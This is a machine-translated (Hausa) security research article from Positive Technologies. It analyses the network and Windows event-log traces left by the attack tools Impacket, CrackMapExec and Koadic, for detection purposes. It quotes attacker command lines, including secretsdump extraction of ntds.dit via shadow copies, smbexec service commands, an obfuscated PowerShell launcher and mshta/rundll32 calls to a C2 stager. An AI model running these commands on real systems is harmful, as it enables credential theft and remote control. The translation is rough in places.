Yawan hare-hare a cikin kamfanoni yana karuwa kowace shekara: misali fiye da na 2016, kuma a ƙarshen 2018 - fiye da lokacin da ya gabata. Ciki har da waɗanda inda babban kayan aiki shine tsarin aiki na Windows. A cikin 2017-2018, APT Dragonfly, APT28, sun kai hare-hare kan kungiyoyin gwamnati da na soji a Turai, Arewacin Amurka da Saudiyya. Kuma mun yi amfani da kayan aiki guda uku don wannan - , и . Lambar tushen su tana buɗe kuma ana samun su akan GitHub.
Ya kamata a lura cewa ba a amfani da waɗannan kayan aikin don shigar da farko ba, amma don haɓaka hari a cikin kayan aikin. Maharan suna amfani da su a matakai daban-daban na harin bayan shigar da kewayen. Wannan, ta hanyar, yana da wuyar ganewa kuma sau da yawa kawai tare da taimakon fasaha ko kayan aikin da ke ba da izini . Kayan aikin suna ba da ayyuka iri-iri, daga canja wurin fayiloli zuwa hulɗa tare da rajista da aiwatar da umarni akan na'ura mai nisa. Mun gudanar da nazarin waɗannan kayan aikin don sanin ayyukan sadarwar su.
Abin da muke bukata mu yi:
- Fahimtar yadda kayan aikin hacking ke aiki. Nemo abin da maharan ke buƙatar amfani da su da kuma irin fasahar da za su iya amfani da su.
- Nemo abin da kayan aikin tsaro na bayanai ba a gano su ba a matakin farko na harin. Za a iya tsallake matakin binciken, ko dai saboda maharin maharin ne na cikin gida, ko kuma saboda maharin yana amfani da rami a cikin kayayyakin more rayuwa da ba a san su a baya ba. Zai yiwu a mayar da dukan jerin ayyukansa, saboda haka sha'awar gano ƙarin motsi.
- Kawar da bayanan karya daga kayan aikin gano kutse. Kada mu manta cewa lokacin da aka gano wasu ayyuka bisa ga binciken kawai, kurakurai akai-akai suna yiwuwa. Yawancin lokaci a cikin ababen more rayuwa akwai isassun hanyoyi masu yawa, waɗanda ba za a iya bambanta su da halal a kallon farko, don samun kowane bayani.
Menene waɗannan kayan aikin ke ba maharan? Idan wannan Impacket ne, to maharan suna karɓar babban ɗakin karatu na kayayyaki waɗanda za a iya amfani da su a matakai daban-daban na harin da ke biyo baya bayan karya kewaye. Yawancin kayan aikin suna amfani da na'urorin Impacket a ciki - misali, Metasploit. Yana da dcomexec da wmiexec don aiwatar da umarni mai nisa, ɓoye sirri don samun asusu daga ƙwaƙwalwar ajiya waɗanda aka ƙara daga Impacket. A sakamakon haka, daidai gano ayyukan irin wannan ɗakin karatu zai tabbatar da gano abubuwan da aka samo asali.
Ba daidaituwa ba ne cewa masu ƙirƙira sun rubuta "Powered by Impacket" game da CrackMapExec (ko kawai CME). Bugu da ƙari, CME yana da shirye-shiryen da aka yi don shahararrun al'amuran: Mimikatz don samun kalmomin shiga ko hashes, aiwatar da Meterpreter ko wakilin Empire don kisa mai nisa, da Bloodhound a kan jirgin.
Kayan aiki na uku da muka zaba shine Koadic. Kwanan nan ne, an gabatar da shi a taron dan gwanin kwamfuta na kasa da kasa DEFCON 25 a cikin 2017 kuma an bambanta shi ta hanyar da ba ta dace ba: yana aiki ta hanyar HTTP, Rubutun Java da Microsoft Visual Basic Script (VBS). Ana kiran wannan hanyar rayuwa daga ƙasa: kayan aikin yana amfani da saiti na dogara da ɗakunan karatu da aka gina a cikin Windows. Masu ƙirƙira suna kiransa COM Command & Control, ko C3.
IMPACKET
Ayyukan Impacket suna da faɗi sosai, kama daga bincike a cikin AD da tattara bayanai daga sabar MS SQL na ciki, zuwa dabaru don samun takaddun shaida: wannan hari ne na SMB, da samun fayil ɗin ntds.dit mai ɗauke da hashes na kalmomin shiga daga mai sarrafa yanki. Impacket kuma yana aiwatar da umarni daga nesa ta amfani da hanyoyi huɗu daban-daban: WMI, Sabis na Gudanar da Jadawalin Windows, DCOM, da SMB, kuma yana buƙatar takaddun shaida don yin hakan.
Tsabar sirri
Bari mu kalli faifan sirri. Wannan tsari ne wanda zai iya kai hari ga injinan mai amfani da masu kula da yanki. Ana iya amfani da shi don samun kwafin wuraren ƙwaƙwalwar ajiya LSA, SAM, SECURITY, NTDS.dit, don haka ana iya gani a matakai daban-daban na harin. Mataki na farko a cikin tsarin tsarin shine tabbatarwa ta hanyar SMB, wanda ke buƙatar ko dai kalmar sirrin mai amfani ko kuma zanta don aiwatar da harin Hash ta atomatik. Na gaba ya zo buƙatar buɗe damar zuwa Manajan Sarrafa Sabis (SCM) da samun damar yin amfani da rajista ta hanyar ka'idar winreg, ta amfani da wanda maharin zai iya gano bayanan rassan sha'awa kuma ya sami sakamako ta hanyar SMB.
A cikin siffa. 1 mun ga yadda daidai lokacin amfani da yarjejeniyar winreg, ana samun dama ta amfani da maɓallin rajista tare da LSA. Don yin wannan, yi amfani da umarnin DCERPC tare da opcode 15 - OpenKey.
Shinkafa 1. Buɗe maɓallin rajista ta amfani da ka'idar winreg
Na gaba, lokacin da aka sami damar shiga maɓalli, ana adana ƙimar tare da umarnin SaveKey tare da opcode 20. Impacket yana yin wannan ta wata takamaiman hanya. Yana adana ƙima zuwa fayil ɗin wanda sunansa kewayon haruffa 8 bazuwar haɗe tare da .tmp. Bugu da ƙari, ƙarin ƙaddamarwa na wannan fayil yana faruwa ta hanyar SMB daga tsarin tsarin System32 (Fig. 2).
Shinkafa 2. Tsari don samun maɓallin rajista daga na'ura mai nisa
Ya bayyana cewa ana iya gano irin wannan aiki akan hanyar sadarwa ta hanyar tambayoyi zuwa wasu rassan rajista ta amfani da ka'idar winreg, takamaiman sunaye, umarni da odar su.
Wannan tsarin kuma yana barin burbushi a cikin log ɗin taron Windows, yana sauƙaƙa ganowa. Misali, sakamakon aiwatar da umarnin
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DCA cikin log ɗin Windows Server 2016 za mu ga jerin maɓalli masu zuwa:
1. 4624 - Logon nesa.
2 - duba haƙƙin samun dama ga sabis na nesa na winreg.
3. 5145 - duba haƙƙin samun damar fayil a cikin tsarin System32. Fayil ɗin yana da sunan bazuwar da aka ambata a sama.
4 - ƙirƙirar tsarin cmd.exe wanda ke ƙaddamar da vssadmin:
“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat5 - ƙirƙirar tsari tare da umarnin:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat6 - ƙirƙirar tsari tare da umarnin:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat7 - ƙirƙirar tsari tare da umarnin:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.batSmbexec
Kamar yawancin kayan aikin bayan amfani, Impacket yana da kayayyaki don aiwatar da umarni daga nesa. Za mu mai da hankali kan smbexec, wanda ke ba da harsashin umarni mai mu'amala akan na'ura mai nisa. Hakanan wannan tsarin yana buƙatar tantancewa ta hanyar SMB, ko dai tare da kalmar sirri ko hash na kalmar sirri. A cikin siffa. A cikin hoto na 3 mun ga misalin yadda irin wannan kayan aiki ke aiki, a wannan yanayin shi ne na'ura mai kula da gida.
Shinkafa 3. Interactive smbexec console
Mataki na farko na smbexec bayan tabbatarwa shine buɗe SCM tare da OpenSCManagerW umurnin (15). Tambayar sananne ce: filin MachineName shine DUMMY.
Shinkafa 4. Buɗe Manajan Sarrafa Sabis
Bayan haka, an ƙirƙiri sabis ɗin ta amfani da umarnin CreateServiceW (12). A cikin yanayin smbexec, zamu iya ganin ma'anar ginin umarni iri ɗaya kowane lokaci. A cikin siffa. 5 kore yana nuna sigogin umarni maras canzawa, rawaya yana nuna abin da maharin zai iya canzawa. Yana da sauƙi a ga cewa ana iya canza sunan fayil ɗin da za a iya aiwatarwa, kundin adireshi da fayil ɗin fitarwa, amma sauran ya fi wahala a canza ba tare da dagula tunanin tsarin Impacket ba.
Shinkafa 5. Nemi ƙirƙirar sabis ta amfani da Manajan Sarrafa Sabis
Smbexec kuma yana barin bayyanannun alamomi a cikin log ɗin taron Windows. A cikin log ɗin Windows Server 2016 don harsashin umarni mai hulɗa tare da umarnin ipconfig, za mu ga jerin maɓalli masu zuwa:
1 - shigar da sabis a kan injin wanda aka azabtar:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2 - ƙirƙirar tsarin cmd.exe tare da muhawara daga aya 4688.
3. 5145 - duba haƙƙin samun dama ga fayil ɗin fitarwa __a cikin kundin adireshin C$.
4. 4697 - shigarwa na sabis akan na'urar wanda aka azabtar.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5 - ƙirƙirar tsarin cmd.exe tare da muhawara daga aya 4688.
6. 5145 - duba haƙƙin samun dama ga fayil ɗin fitarwa __a cikin kundin adireshin C$.
Impacket shine tushen haɓaka kayan aikin hari. Yana goyan bayan kusan dukkanin ladabi a cikin kayan aikin Windows kuma a lokaci guda yana da sifofin halayensa. Anan akwai takamaiman buƙatun winreg, da kuma amfani da API na SCM tare da ingantaccen tsari na umarni, da tsarin sunan fayil, da raba SMB SYSTEM32.
CRACKMAPEXEC
An ƙera kayan aikin CME da farko don sarrafa waɗannan ayyukan yau da kullun waɗanda maharin ya yi don ci gaba a cikin hanyar sadarwa. Yana ba ku damar yin aiki tare tare da sanannen wakilin Empire da Meterpreter. Don aiwatar da umarni a ɓoye, CME na iya ɓoye su. Yin amfani da Bloodhound (wani kayan aikin bincike na daban), maharin zai iya sarrafa aikin bincike don zaman mai gudanarwa na yanki.
Bloodhound
Bloodhound, azaman kayan aiki mai zaman kansa, yana ba da damar haɓakar hankali a cikin hanyar sadarwa. Yana tattara bayanai game da masu amfani, inji, ƙungiyoyi, zaman kuma ana kawo su azaman rubutun PowerShell ko fayil na binary. Ana amfani da ka'idoji na tushen LDAP ko SMB don tattara bayanai. Tsarin haɗin kai na CME yana ba ku damar zazzage Bloodhound akan na'urar wanda aka azabtar, gudanar da shi kuma karɓar bayanan da aka tattara bayan aiwatarwa, ta haka ke sarrafa ayyuka a cikin tsarin kuma suna sa su zama marasa fahimta. Harsashi mai hoto na Bloodhound yana gabatar da bayanan da aka tattara a cikin nau'i na jadawali, wanda ke ba ku damar nemo mafi guntuwar hanya daga injin maharin zuwa mai gudanar da yanki.
Shinkafa 6. Interface na jini
Don yin aiki akan injin wanda aka azabtar, tsarin yana ƙirƙirar ɗawainiya ta amfani da ATSVC da SMB. ATSVC shine keɓancewa don aiki tare da Jadawalin Aiki na Windows. CME tana amfani da aikin NetrJobAdd(1) don ƙirƙirar ayyuka akan hanyar sadarwa. Misalin abin da tsarin CME ke aikawa yana nunawa a cikin siffa. 7: Wannan kiran umarni ne na cmd.exe da lambar ɓoye a cikin nau'i na jayayya a cikin tsarin XML.
Hoto.7. Ƙirƙirar aiki ta hanyar CME
Bayan an ƙaddamar da aikin don aiwatarwa, injin wanda aka azabtar ya fara Bloodhound kanta, kuma ana iya ganin wannan a cikin zirga-zirga. An siffanta tsarin da tambayoyin LDAP don samun daidaitattun ƙungiyoyi, jerin duk injuna da masu amfani a cikin yankin, da samun bayanai game da zaman mai amfani mai aiki ta hanyar buƙatar SRVSVC NetSessEnum.
Shinkafa 8. Samun jerin lokuta masu aiki ta hanyar SMB
Bugu da kari, ƙaddamar da Bloodhound akan injin wanda aka azabtar tare da kunna dubawa yana tare da wani taron mai ID 4688 (ƙirƙirar tsari) da sunan tsari. «C:WindowsSystem32cmd.exe». Babban abin lura game da shi shine gardamar layin umarni:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "Enum_avproducts
Tsarin enum_avproducts yana da ban sha'awa sosai daga ra'ayi na ayyuka da aiwatarwa. WMI yana ba ku damar amfani da yaren tambayar WQL don dawo da bayanai daga abubuwa daban-daban na Windows, wanda shine ainihin abin da wannan tsarin CME ke amfani da shi. Yana haifar da tambayoyi zuwa azuzuwan AntiSpywareProduct da AntiМirusProduct game da kayan aikin kariya da aka sanya akan injin wanda aka azabtar. Domin samun bayanan da suka wajaba, tsarin yana haɗawa da rootSecurityCenter2 namespace, sannan ya haifar da tambayar WQL kuma yana karɓar amsa. A cikin siffa. Hoto na 9 yana nuna abubuwan da ke cikin irin waɗannan buƙatun da martani. A cikin misalinmu, an sami Windows Defender.
Shinkafa 9. Ayyukan cibiyar sadarwa na enum_avproducts module
Sau da yawa, duban WMI (Trace WMI-Activity), wanda a cikin abubuwan da ke faruwa zaka iya samun bayanai masu amfani game da tambayoyin WQL, ƙila a kashe. Amma idan an kunna, to, idan an kunna rubutun enum_avproducts, za a adana wani taron mai ID 11. Zai ƙunshi sunan mai amfani da ya aiko da buƙatar da sunan a cikin rootSecurityCenter2 namespace.
Kowane nau'in CME yana da nasa kayan tarihi, kasancewa takamaiman tambayoyin WQL ko ƙirƙirar wani nau'in ɗawainiya a cikin mai tsara ɗawainiya tare da ɓarna da takamaiman aikin Jini a cikin LDAP da SMB.
KOADIC
Babban fasalin Koadic shine amfani da JavaScript da masu fassarar VBScript da aka gina cikin Windows. A wannan ma'anar, yana bin yanayin rayuwa daga yanayin ƙasa - wato, ba shi da abin dogaro na waje kuma yana amfani da daidaitattun kayan aikin Windows. Wannan kayan aiki ne don cikakken Umurni & Sarrafa (CnC), tunda bayan kamuwa da cuta an shigar da "shigar" akan injin, yana ba da damar sarrafa shi. Irin wannan na'ura, a cikin kalmomin Koadic, ana kiranta "zombie". Idan babu isassun gata don cikakken aiki a gefen wanda aka azabtar, Koadic yana da ikon haɓaka su ta amfani da dabarun Kula da Asusun Mai amfani (UAC bypass).
Shinkafa 10. Koadic Shell
Dole ne wanda aka azabtar ya fara sadarwa tare da Umurnin & Sarrafa uwar garken. Don yin wannan, tana buƙatar tuntuɓar URI da aka shirya a baya kuma ta karɓi babban jikin Koadic ta amfani da ɗayan matakan. A cikin siffa. Hoto na 11 yana nuna misali ga ma'aunin mshta.
Shinkafa 11. Fara zama tare da uwar garken CnC
Dangane da madaidaicin amsawar WS, ya bayyana a fili cewa aiwatarwa yana faruwa ta hanyar WScript.Shell, da masu canji STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE sun ƙunshi mahimman bayanai game da sigogin zaman na yanzu. Wannan shine nau'in amsa buƙatu na farko a cikin haɗin HTTP tare da uwar garken CnC. Buƙatun na gaba suna da alaƙa kai tsaye da ayyukan da ake kira modules (implants). Duk samfuran Koadic suna aiki kawai tare da zama mai aiki tare da CnC.
Mimikatz
Kamar dai yadda CME ke aiki tare da Bloodhound, Koadic yana aiki tare da Mimikatz azaman shirin daban kuma yana da hanyoyi da yawa don ƙaddamar da shi. A ƙasa akwai nau'i-nau'i na amsa buƙatu don zazzage dasawar Mimikatz.
Shinkafa 12. Canja wurin Mimikatz zuwa Koadic
Kuna iya ganin yadda tsarin URI a cikin buƙatun ya canza. Yanzu ya ƙunshi ƙima don canjin csrf, wanda ke da alhakin zaɓaɓɓen tsarin. Kada ku kula da sunanta; Dukanmu mun san cewa CSRF yawanci ana fahimta daban. Amsar ita ce babban jikin Koadic, wanda aka ƙara lambar da ke da alaƙa da Mimikatz. Yana da girma sosai, don haka bari mu kalli mahimman abubuwan. Anan muna da ɗakin karatu na Mimikatz wanda aka sanya shi a cikin base64, aji na .NET serialized wanda zai yi masa allura, da muhawara don ƙaddamar da Mimikatz. Sakamakon aiwatarwa ana watsa shi akan hanyar sadarwa a cikin bayyanannen rubutu.
Shinkafa 13. Sakamakon Gudun Mimikatz akan na'ura mai nisa
Exec_cmd
Koadic kuma yana da kayayyaki waɗanda zasu iya aiwatar da umarni daga nesa. Anan zamu ga hanyar tsarar URI iri ɗaya da saba sid da masu canjin csrf. A cikin yanayin tsarin exec_cmd, ana ƙara lamba zuwa jikin da ke da ikon aiwatar da umarnin harsashi. Ana nuna irin wannan lambar da ke ƙasa a cikin martanin HTTP na uwar garken CnC.
Shinkafa 14. Implant code exec_cmd
Ana buƙatar canjin GAWTUUGCFI tare da sanannen sifa WS don aiwatar da lambar. Tare da taimakonsa, dasawa yana kiran harsashi, yana sarrafa rassan code guda biyu - shell.exec tare da dawo da bayanan fitarwa da shell.run ba tare da dawowa ba.
Koadic ba kayan aiki ba ne na yau da kullun, amma yana da kayan tarihi na kansa waɗanda za a iya samun su a cikin halaltaccen zirga-zirga:
- musamman samuwar buƙatun HTTP,
- ta amfani da winHttpRequests API,
- ƙirƙirar WScript.Shell abu ta hanyar ActiveXObject,
- babban executable jiki.
Haɗin farko yana farawa ta hanyar ma'auni, don haka yana yiwuwa a gano ayyukansa ta abubuwan da suka faru na Windows. Don mshta, wannan shine taron 4688, wanda ke nuna ƙirƙirar tsari tare da sifa ta farko:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6Yayin da Koadic ke gudana, zaku iya ganin sauran abubuwan 4688 tare da halayen da suka siffanta shi da kyau:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1binciken
Halin rayuwa a cikin ƙasa yana samun karɓuwa a tsakanin masu laifi. Suna amfani da kayan aiki da hanyoyin da aka gina a cikin Windows don bukatunsu. Muna ganin shahararrun kayan aikin Koadic, CrackMapExec da Impacket suna bin wannan ƙa'idar suna ƙara bayyana a cikin rahotannin APT. Yawan cokali mai yatsu akan GitHub don waɗannan kayan aikin shima yana girma, kuma sababbi suna bayyana (akwai kusan dubu daga cikinsu yanzu). Halin yana samun karɓuwa saboda sauƙi: maharan ba sa buƙatar kayan aikin ɓangare na uku; sun riga sun kasance a kan injinan waɗanda abin ya shafa kuma suna taimaka musu su ketare matakan tsaro. Muna mayar da hankali kan nazarin sadarwar cibiyar sadarwa: kowane kayan aiki da aka kwatanta a sama yana barin alamunsa a cikin hanyoyin sadarwa; cikakken nazarin su ya ba mu damar koyar da samfurinmu gano su, wanda a ƙarshe yana taimakawa wajen bincika duk jerin abubuwan da suka faru na yanar gizo da suka shafi su.
Authors:
- Anton Tyurin, Shugaban Sashen Sabis na Kwararru, Cibiyar Tsaro ta Kwararrun PT, Fasaha mai Kyau
- Egor Podmokov, gwani, PT Expert Security Center, Kyawawan Fasaha
source: www.habr.com